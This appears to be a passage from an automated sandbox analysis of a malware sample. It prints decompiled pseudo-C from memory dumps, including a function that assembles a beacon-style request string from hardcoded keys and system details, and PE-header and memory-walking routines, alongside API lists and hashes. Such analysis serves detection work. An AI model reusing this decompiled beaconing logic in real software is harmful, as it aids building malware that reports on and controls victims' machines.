									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x2ced328 = 1;
										__eflags =  *0x2ced328;
										if( *0x2ced328 != 0) {
											goto L60;
										}
										_t84 =  *0x2ced2e0; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x2ced328 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x2ced2e0 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x2ced2e8 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x2ced2e4 + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x2ced2e8 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x2ced2e8 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x2ced328 = 1;
							__eflags =  *0x2ced328;
							if( *0x2ced328 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x2ced2e8 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x2ced2e8 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x2ced328 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x2ced2e8 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x2ced2e0 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x2ced2e8 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x2ced2e8 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x02ceb1ef
0x02ceb1f2
0x02ceb1f8
0x02ceb216
0x00000000
0x02ceb216
0x02ceb200
0x02ceb209
0x02ceb20f
0x02ceb21e
0x02ceb221
0x02ceb224
0x02ceb22e
0x02ceb22e
0x02ceb230
0x02ceb233
0x02ceb235
0x02ceb235
0x02ceb237
0x02ceb23a
0x00000000
0x00000000
0x02ceb23c
0x02ceb23e
0x02ceb2a4
0x02ceb2a4
0x02ceb402
0x00000000
0x02ceb402
0x02ceb240
0x02ceb240
0x02ceb244
0x02ceb246
0x02ceb246
0x02ceb246
0x02ceb246
0x02ceb249
0x02ceb24a
0x02ceb24d
0x02ceb24d
0x02ceb251
0x02ceb255
0x02ceb263
0x02ceb263
0x02ceb26b
0x02ceb271
0x02ceb273
0x02ceb275
0x02ceb285
0x02ceb292
0x02ceb296
0x02ceb29b
0x02ceb29d
0x02ceb31b
0x02ceb31b
0x02ceb29f
0x02ceb29f
0x02ceb29f
0x02ceb31d
0x02ceb31f
0x02ceb400
0x02ceb400
0x00000000
0x02ceb325
0x02ceb325
0x02ceb32c
0x00000000
0x00000000
0x02ceb332
0x02ceb336
0x02ceb392
0x02ceb394
0x02ceb39c
0x02ceb39e
0x02ceb3a0
0x00000000
0x00000000
0x02ceb3a2
0x02ceb3a8
0x02ceb3aa
0x02ceb3ac
0x02ceb3c1
0x02ceb3c1
0x02ceb3c3
0x02ceb3f2
0x02ceb3f9
0x00000000
0x02ceb3f9
0x02ceb3c7
0x02ceb3c8
0x02ceb3ca
0x02ceb3cc
0x02ceb3cc
0x02ceb3ce
0x02ceb3d0
0x02ceb3d2
0x02ceb3e6
0x02ceb3e6
0x02ceb3e9
0x02ceb3eb
0x02ceb3eb
0x02ceb3ec
0x02ceb3ec
0x00000000
0x02ceb3d4
0x02ceb3d4
0x02ceb3d4
0x02ceb3dd
0x02ceb3de
0x02ceb3e0
0x02ceb3e2
0x02ceb3e2
0x00000000
0x02ceb3d4
0x02ceb3d2
0x02ceb3ae
0x02ceb3b5
0x02ceb3b5
0x02ceb3b7
0x00000000
0x00000000
0x02ceb3b9
0x02ceb3ba
0x02ceb3bd
0x02ceb3bf
0x00000000
0x00000000
0x00000000
0x02ceb3bf
0x00000000
0x02ceb3b5
0x02ceb338
0x02ceb33b
0x02ceb340
0x00000000
0x00000000
0x02ceb349
0x02ceb34b
0x02ceb351
0x00000000
0x00000000
0x02ceb357
0x02ceb35d
0x00000000
0x00000000
0x02ceb363
0x02ceb365
0x02ceb36e
0x02ceb372
0x00000000
0x00000000
0x02ceb378
0x02ceb37b
0x02ceb37d
0x00000000
0x00000000
0x02ceb384
0x02ceb386
0x00000000
0x00000000
0x02ceb388
0x02ceb38c
0x00000000
0x00000000
0x00000000
0x02ceb38c
0x00000000
0x00000000
0x00000000
0x02ceb277
0x02ceb277
0x02ceb277
0x02ceb27e
0x00000000
0x00000000
0x02ceb280
0x02ceb281
0x02ceb283
0x00000000
0x00000000
0x00000000
0x02ceb283
0x02ceb2ab
0x02ceb2ad
0x00000000
0x00000000
0x02ceb2bd
0x02ceb2bf
0x02ceb2c1
0x00000000
0x00000000
0x02ceb2c7
0x02ceb2ce
0x02ceb2fa
0x02ceb2fa
0x02ceb2fc
0x02ceb2fe
0x02ceb312
0x02ceb314
0x00000000
0x00000000
0x00000000
0x00000000
0x02ceb300
0x02ceb300
0x02ceb300
0x02ceb309
0x02ceb30a
0x02ceb30c
0x02ceb30e
0x02ceb30e
0x00000000
0x02ceb300
0x02ceb2d0
0x02ceb2d0
0x02ceb2d3
0x02ceb2d5
0x02ceb2e7
0x02ceb2e7
0x02ceb2ea
0x02ceb2ec
0x02ceb2ec
0x02ceb2ed
0x02ceb2ed
0x02ceb2f3
0x02ceb2f3
0x00000000
0x00000000
0x00000000
0x00000000
0x02ceb2d7
0x02ceb2d7
0x02ceb2d7
0x02ceb2de
0x00000000
0x00000000
0x02ceb2e0
0x02ceb2e0
0x02ceb2e1
0x00000000
0x00000000
0x00000000
0x02ceb2e1
0x02ceb2e3
0x02ceb2e5
0x02ceb2f8
0x00000000
0x00000000
0x00000000
0x02ceb2f8
0x00000000
0x02ceb2e5
0x02ceb257
0x02ceb25a
0x02ceb25d
0x00000000
0x00000000
0x02ceb25f
0x02ceb261
0x00000000
0x00000000
0x00000000
0x02ceb261
0x02ceb226
0x02ceb228
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 02CEB296

Memory Dump Source

Source File: 00000011.00000002.529940632.0000000002CE1000.00000020.00020000.sdmp, Offset: 02CE0000, based on PE: true

Associated: 00000011.00000002.529881396.0000000002CE0000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530095614.0000000002CEC000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.530191336.0000000002CED000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530233997.0000000002CEF000.00000002.00020000.sdmp Download File

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: 632f81dce749f74c7d530a4902e3a729b1ed8629212506aa98600aec6a2477d8
Instruction ID: 5927b342dd77349b92bef96bc78340deb74264768a3ad8ff2cf79d17370850c7
Opcode Fuzzy Hash: 632f81dce749f74c7d530a4902e3a729b1ed8629212506aa98600aec6a2477d8
Instruction Fuzzy Hash: 0161BD31A006068FDF2ACA69D89173D73A6FFC535CF248529D85BCB290EB30DE42CA50

Uniqueness

Uniqueness Score: -1.00%

Function 0036E4B5, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 00366300: GetLastError.KERNEL32(00000000,00000000,00000004,003567A2,00000000,00000000,00000000,?,0036A292,00000000,00000000,?,004EAB34,00000000), ref: 00366305
Part of subcall function 00366300: SetLastError.KERNEL32(00000000,004D88A0,000000FF,?,0036A292,00000000,00000000,?,004EAB34,00000000), ref: 003663A3

EnumSystemLocalesW.KERNEL32(0036E5DB,00000001,00000000,?,-00000050,?,0036EC09,00000000,?,?,?,00000055,?), ref: 0036E527

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: c95f819b363c772bb0de89f9b946f042790b8ce9dcefbb7397137de8b32333fa
Instruction ID: abf3d8cb92ab528f08a2e08180521b4980586caef68916b688bb8c9116509a4e
Opcode Fuzzy Hash: c95f819b363c772bb0de89f9b946f042790b8ce9dcefbb7397137de8b32333fa
Instruction Fuzzy Hash: C511293B2007059FDB199F39C8915BAB792FF80358B15842CEA8787A44E771A946CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0036E550, Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

Part of subcall function 00366300: GetLastError.KERNEL32(00000000,00000000,00000004,003567A2,00000000,00000000,00000000,?,0036A292,00000000,00000000,?,004EAB34,00000000), ref: 00366305
Part of subcall function 00366300: SetLastError.KERNEL32(00000000,004D88A0,000000FF,?,0036A292,00000000,00000000,?,004EAB34,00000000), ref: 003663A3

EnumSystemLocalesW.KERNEL32(0036E82E,00000001,00000000,?,-00000050,?,0036EBCD,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 0036E59A

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: f979ac4b26b70c244a1e72b299ab79804e596cc8e1d3abd56315df8dd8ce9b27
Instruction ID: c5873482e2533490163b531780a265d3cbf90f3e4872125bd35e110d4deaff11
Opcode Fuzzy Hash: f979ac4b26b70c244a1e72b299ab79804e596cc8e1d3abd56315df8dd8ce9b27
Instruction Fuzzy Hash: C3F0F63A2003045FDB269F39D881A7A7B95EF8176CF15C42DFA464B694E7B1EC06C750

Uniqueness

Uniqueness Score: -1.00%

Function 0036655F, Relevance: 1.5, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 00364A4A: RtlEnterCriticalSection.NTDLL(?), ref: 00364A59

EnumSystemLocalesW.KERNEL32(00366552,00000001,004B3690,0000000C,003669BD,00000000), ref: 00366597

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 1e5d305429aaeb37747b4dd49667d3c9576d6364660bf6e72a8b77e623ff0283
Instruction ID: c28cf7492130eedd19c961085bc0d0b6b5d1e1f6bd730a6746d194587fa4a137
Opcode Fuzzy Hash: 1e5d305429aaeb37747b4dd49667d3c9576d6364660bf6e72a8b77e623ff0283
Instruction Fuzzy Hash: F4F0A932A00208EFD701EF98E886B9C77F0EB08721F10812AF401DF2A0CB7599448F94

Uniqueness

Uniqueness Score: -1.00%

Function 0036E46A, Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00366300: GetLastError.KERNEL32(00000000,00000000,00000004,003567A2,00000000,00000000,00000000,?,0036A292,00000000,00000000,?,004EAB34,00000000), ref: 00366305
Part of subcall function 00366300: SetLastError.KERNEL32(00000000,004D88A0,000000FF,?,0036A292,00000000,00000000,?,004EAB34,00000000), ref: 003663A3

EnumSystemLocalesW.KERNEL32(0036E3C3,00000001,00000000,?,?,0036EC2B,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0036E4A1

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: c2c67ac13b22dcbd69df31fa2c3d251a6e9ccbc5c9b68d29124971923497a966
Instruction ID: 852fcab705cd4dc3a86a2476dd86d38a9f73b1a0b76a7b672c5bb34dbb5452bc
Opcode Fuzzy Hash: c2c67ac13b22dcbd69df31fa2c3d251a6e9ccbc5c9b68d29124971923497a966
Instruction Fuzzy Hash: 4DF0553E30020857CB069F36D805A6BBF94EFC1B50F078058EE058B394C671D846C790

Uniqueness

Uniqueness Score: -1.00%

Function 00366AC1, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00363D50,?,20001004,00000000,00000002,?,?,0036335D), ref: 00366AF5

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 89ac81d0c684e3934d5a34be493f07b8041b2a707b2b6ce241872b24ade8154b
Instruction ID: 1d3d6ab92c09c03dc2f09bf6ef1ff1d625128235324a537c1fd0cbec962c1ec5
Opcode Fuzzy Hash: 89ac81d0c684e3934d5a34be493f07b8041b2a707b2b6ce241872b24ade8154b
Instruction Fuzzy Hash: C8E04F31500118BBCF136F61ED26E9E7F2EEF44790F00C411FD4569125CB728D21AA99

Uniqueness

Uniqueness Score: -1.00%

Function 6DA85BE9, Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.530977415.000000006D851000.00000020.00020000.sdmp, Offset: 6D850000, based on PE: true

Associated: 00000011.00000002.530970653.000000006D850000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.531353953.000000006DBC5000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.531449744.000000006DCB0000.00000008.00020000.sdmp Download File
Associated: 00000011.00000002.531458292.000000006DCB3000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.531465886.000000006DCB7000.00000008.00020000.sdmp Download File
Associated: 00000011.00000002.531479113.000000006DCC6000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.531486995.000000006DCCA000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.531496032.000000006DCCB000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53a3695963f1732ff742ba43ad1f0d804eb29c4fa763d261e4ca38e61c2c694f
Instruction ID: 473c59c5e52faadd7fbc19487a9e28975039a29343dd434f85f06ca1ebac17aa
Opcode Fuzzy Hash: 53a3695963f1732ff742ba43ad1f0d804eb29c4fa763d261e4ca38e61c2c694f
Instruction Fuzzy Hash: B6F0A071E282249BCB16C748C504B5873B8EB05B61F111056EA42EB241D370DD80CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 00366DDC, Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d09062f6cc8e02bb140ba6899d5060605ef95e615ef4f5538d0003ba723c570
Instruction ID: 3a180853418f0764a17c8456b90bdb688990295d6d20a643997e515c7ae7ab69
Opcode Fuzzy Hash: 1d09062f6cc8e02bb140ba6899d5060605ef95e615ef4f5538d0003ba723c570
Instruction Fuzzy Hash: CDE08C32911238EBCB16DB98CA0998AF3FCEB44B80B168096F501E3104C270DE00C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 0039AC46, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.527303081.000000000039A000.00000040.00020000.sdmp, Offset: 0039A000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4738e9d22b7a670e957569a9947fd17b9771784ab9a70797d5a1e1428e800be
Instruction ID: be7eecee3400b42b3e558a840de4aeb97e4223185f45bdd8b65d759b642826a8
Opcode Fuzzy Hash: a4738e9d22b7a670e957569a9947fd17b9771784ab9a70797d5a1e1428e800be
Instruction Fuzzy Hash: 85A002321A5B8CC7C612A68DA651B51B3ECE348D54F440461A50D43E015659B9108495

Uniqueness

Uniqueness Score: -1.00%

Function 02CE5450, Relevance: 33.2, APIs: 22, Instructions: 244
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E02CE5450(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t67;
				intOrPtr _t68;
				int _t71;
				void* _t72;
				void* _t73;
				void* _t75;
				void* _t78;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr* _t88;
				void* _t94;
				intOrPtr _t100;
				signed int _t104;
				char** _t106;
				int _t109;
				intOrPtr* _t112;
				intOrPtr* _t114;
				intOrPtr* _t116;
				intOrPtr* _t118;
				intOrPtr _t121;
				intOrPtr _t126;
				int _t130;
				CHAR* _t132;
				intOrPtr _t133;
				void* _t134;
				void* _t143;
				int _t144;
				void* _t145;
				intOrPtr _t146;
				void* _t148;
				long _t152;
				intOrPtr* _t153;
				intOrPtr* _t154;
				intOrPtr* _t157;
				void* _t158;
				void* _t160;

				_t143 = __edx;
				_t134 = __ecx;
				_t59 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t59 = GetTickCount();
				}
				_t60 =  *0x2ced018; // 0x98333b35
				asm("bswap eax");
				_t61 =  *0x2ced014; // 0x3a87c8cd
				_t132 = _a16;
				asm("bswap eax");
				_t62 =  *0x2ced010; // 0xd8d2f808
				asm("bswap eax");
				_t63 =  *0x2ced00c; // 0x62819102
				asm("bswap eax");
				_t64 =  *0x2ced2a8; // 0xeba5a8
				_t3 = _t64 + 0x2cee633; // 0x74666f73
				_t144 = wsprintfA(_t132, _t3, 3, 0x3d163, _t63, _t62, _t61, _t60,  *0x2ced02c,  *0x2ced004, _t59);
				_t67 = E02CE3288();
				_t68 =  *0x2ced2a8; // 0xeba5a8
				_t4 = _t68 + 0x2cee673; // 0x74707526
				_t71 = wsprintfA(_t144 + _t132, _t4, _t67);
				_t160 = _t158 + 0x38;
				_t145 = _t144 + _t71;
				_t72 = E02CE831C(_t134);
				_t133 = __imp__;
				_v8 = _t72;
				if(_t72 != 0) {
					_t126 =  *0x2ced2a8; // 0xeba5a8
					_t7 = _t126 + 0x2cee8d4; // 0x736e6426
					_t130 = wsprintfA(_a16 + _t145, _t7, _t72);
					_t160 = _t160 + 0xc;
					_t145 = _t145 + _t130;
					HeapFree( *0x2ced238, 0, _v8);
				}
				_t73 = E02CE9267();
				_v8 = _t73;
				if(_t73 != 0) {
					_t121 =  *0x2ced2a8; // 0xeba5a8
					_t11 = _t121 + 0x2cee8dc; // 0x6f687726
					wsprintfA(_t145 + _a16, _t11, _t73);
					_t160 = _t160 + 0xc;
					HeapFree( *0x2ced238, 0, _v8);
				}
				_t146 =  *0x2ced32c; // 0x3ba95b0
				_t75 = E02CE284E(0x2ced00a, _t146 + 4);
				_t152 = 0;
				_v20 = _t75;
				if(_t75 == 0) {
					L26:
					HeapFree( *0x2ced238, _t152, _a16);
					return _v12;
				} else {
					_t78 = RtlAllocateHeap( *0x2ced238, 0, 0x800);
					_v8 = _t78;
					if(_t78 == 0) {
						L25:
						HeapFree( *0x2ced238, _t152, _v20);
						goto L26;
					}
					E02CE3239(GetTickCount());
					_t82 =  *0x2ced32c; // 0x3ba95b0
					__imp__(_t82 + 0x40);
					asm("lock xadd [eax], ecx");
					_t86 =  *0x2ced32c; // 0x3ba95b0
					__imp__(_t86 + 0x40);
					_t88 =  *0x2ced32c; // 0x3ba95b0
					_t148 = E02CE7B8D(1, _t143, _a16,  *_t88);
					_v28 = _t148;
					asm("lock xadd [eax], ecx");
					if(_t148 == 0) {
						L24:
						HeapFree( *0x2ced238, _t152, _v8);
						goto L25;
					}
					StrTrimA(_t148, 0x2cec28c);
					_push(_t148);
					_t94 = E02CEA677();
					_v16 = _t94;
					if(_t94 == 0) {
						L23:
						HeapFree( *0x2ced238, _t152, _t148);
						goto L24;
					}
					_t153 = __imp__;
					 *_t153(_t148, _a4);
					 *_t153(_v8, _v20);
					_t154 = __imp__;
					 *_t154(_v8, _v16);
					_t100 = E02CE7B3B( *_t154(_v8, _t148), _v8);
					_a4 = _t100;
					if(_t100 == 0) {
						_v12 = 8;
						L21:
						E02CE5433();
						L22:
						HeapFree( *0x2ced238, 0, _v16);
						_t152 = 0;
						goto L23;
					}
					_t104 = E02CE9F33(_t133, 0xffffffffffffffff, _t148,  &_v24);
					_v12 = _t104;
					if(_t104 == 0) {
						_t157 = _v24;
						_v12 = E02CE137B(_t157, _a4, _a8, _a12);
						_t112 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t112 + 0x80))(_t112);
						_t114 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t114 + 8))(_t114);
						_t116 =  *((intOrPtr*)(_t157 + 4));
						 *((intOrPtr*)( *_t116 + 8))(_t116);
						_t118 =  *_t157;
						 *((intOrPtr*)( *_t118 + 8))(_t118);
						E02CE8B22(_t157);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t106 = _a8;
							if(_t106 != 0) {
								_t149 =  *_t106;
								_t155 =  *_a12;
								wcstombs( *_t106,  *_t106,  *_a12);
								_t109 = E02CE7953(_t149, _t149, _t155 >> 1);
								_t148 = _v28;
								 *_a12 = _t109;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E02CE8B22(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}

0x02ce5450
0x02ce5450
0x02ce5450
0x02ce5459
0x02ce5462
0x02ce5464
0x02ce5464
0x02ce5471
0x02ce547c
0x02ce547f
0x02ce5484
0x02ce548d
0x02ce5490
0x02ce5495
0x02ce5498
0x02ce549d
0x02ce54a0
0x02ce54ac
0x02ce54b9
0x02ce54bb
0x02ce54c1
0x02ce54c6
0x02ce54d1
0x02ce54d3
0x02ce54d6
0x02ce54d8
0x02ce54dd
0x02ce54e3
0x02ce54e8
0x02ce54eb
0x02ce54f0
0x02ce54fd
0x02ce54ff
0x02ce5505
0x02ce550f
0x02ce550f
0x02ce5511
0x02ce5516
0x02ce551b
0x02ce551e
0x02ce5523
0x02ce5530
0x02ce5532
0x02ce5540
0x02ce5540
0x02ce5542
0x02ce5550
0x02ce5555
0x02ce5557
0x02ce555c
0x02ce571d
0x02ce5727
0x02ce5730
0x02ce5562
0x02ce556e
0x02ce5574
0x02ce5579
0x02ce5711
0x02ce571b
0x00000000
0x02ce571b
0x02ce5585
0x02ce558a
0x02ce5593
0x02ce55a4
0x02ce55a8
0x02ce55b1
0x02ce55b7
0x02ce55c6
0x02ce55cd
0x02ce55d6
0x02ce55dc
0x02ce5705
0x02ce570f
0x00000000
0x02ce570f
0x02ce55e8
0x02ce55ee
0x02ce55ef
0x02ce55f4
0x02ce55f9
0x02ce56fb
0x02ce5703
0x00000000
0x02ce5703
0x02ce5602
0x02ce5609
0x02ce5611
0x02ce5616
0x02ce561f
0x02ce562a
0x02ce562f
0x02ce5634
0x02ce5733
0x02ce56e7
0x02ce56e7
0x02ce56ec
0x02ce56f7
0x02ce56f9
0x00000000
0x02ce56f9
0x02ce563e
0x02ce5643
0x02ce5648
0x02ce564d
0x02ce565d
0x02ce5660
0x02ce5666
0x02ce566c
0x02ce5672
0x02ce5675
0x02ce567b
0x02ce567e
0x02ce5683
0x02ce5687
0x02ce5687
0x02ce5693
0x02ce569f
0x02ce56a3
0x02ce56a5
0x02ce56aa
0x02ce56ac
0x02ce56b1
0x02ce56b6
0x02ce56c3
0x02ce56cb
0x02ce56ce
0x02ce56ce
0x02ce56aa
0x00000000
0x02ce5695
0x02ce5699
0x02ce56d0
0x02ce56d3
0x02ce56dc
0x00000000
0x00000000
0x00000000
0x00000000
0x02ce56dc
0x02ce569b
0x00000000
0x02ce569b
0x02ce5693

APIs

GetTickCount.KERNEL32 ref: 02CE5464
wsprintfA.USER32 ref: 02CE54B4
wsprintfA.USER32 ref: 02CE54D1
wsprintfA.USER32 ref: 02CE54FD
HeapFree.KERNEL32(00000000,?), ref: 02CE550F
wsprintfA.USER32 ref: 02CE5530
HeapFree.KERNEL32(00000000,?), ref: 02CE5540
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02CE556E
GetTickCount.KERNEL32 ref: 02CE557F
RtlEnterCriticalSection.NTDLL(03BA9570), ref: 02CE5593
RtlLeaveCriticalSection.NTDLL(03BA9570), ref: 02CE55B1

Part of subcall function 02CE7B8D: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,73FCC740,?,?,02CE9DA0,?,03BA95B0), ref: 02CE7BB8
Part of subcall function 02CE7B8D: lstrlen.KERNEL32(?,?,?,02CE9DA0,?,03BA95B0), ref: 02CE7BC0
Part of subcall function 02CE7B8D: strcpy.NTDLL ref: 02CE7BD7
Part of subcall function 02CE7B8D: lstrcat.KERNEL32(00000000,?), ref: 02CE7BE2
Part of subcall function 02CE7B8D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,02CE9DA0,?,03BA95B0), ref: 02CE7BFF

StrTrimA.SHLWAPI(00000000,02CEC28C,?,03BA95B0), ref: 02CE55E8

Part of subcall function 02CEA677: lstrlen.KERNEL32(03BA9B78,00000000,00000000,73FCC740,02CE9DCB,00000000), ref: 02CEA687
Part of subcall function 02CEA677: lstrlen.KERNEL32(?), ref: 02CEA68F
Part of subcall function 02CEA677: lstrcpy.KERNEL32(00000000,03BA9B78), ref: 02CEA6A3
Part of subcall function 02CEA677: lstrcat.KERNEL32(00000000,?), ref: 02CEA6AE

lstrcpy.KERNEL32(00000000,?), ref: 02CE5609
lstrcpy.KERNEL32(?,?), ref: 02CE5611
lstrcat.KERNEL32(?,?), ref: 02CE561F
lstrcat.KERNEL32(?,00000000), ref: 02CE5625

Part of subcall function 02CE7B3B: lstrlen.KERNEL32(?,00000000,03BA9D88,00000000,02CE5142,03BA9FAB,?,?,?,?,?,69B25F44,00000005,02CED00C), ref: 02CE7B42
Part of subcall function 02CE7B3B: mbstowcs.NTDLL ref: 02CE7B6B
Part of subcall function 02CE7B3B: memset.NTDLL ref: 02CE7B7D

wcstombs.NTDLL ref: 02CE56B6

Part of subcall function 02CE137B: SysAllocString.OLEAUT32(?), ref: 02CE13B6

Part of subcall function 02CE8B22: HeapFree.KERNEL32(00000000,00000000,02CE131A,00000000,?,?,00000000), ref: 02CE8B2E

